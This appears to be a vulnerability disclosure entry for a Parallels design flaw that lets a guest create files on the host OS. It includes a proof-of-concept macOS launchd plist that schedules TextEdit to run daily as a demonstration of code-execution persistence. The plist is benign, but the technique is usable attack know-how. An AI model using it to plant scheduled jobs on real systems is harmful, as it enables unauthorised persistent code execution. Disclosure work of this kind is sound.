source: https://www.securityfocus.com/bid/22597/info Parallels is prone to an arbitrary code-execution vulnerability because of a design flaw in the affected application. An attacker can exploit this issue to create files in the host operating system. This could result in the execution of code. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http:// www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key> <string>com.apple.test</string> <key>LowPriorityIO</key> <true/> <key>Nice</key> <integer>1</integer> <key>ProgramArguments</key> <array> <string>/Applications/TextEdit.app/Contents/MacOS/TextEdit</string> <string>daily</string> </array> <key>StartCalendarInterval</key> <dict> <key>Hour</key> <integer>18</integer> <key>Minute</key> <integer>0</integer> </dict> </dict> </plist>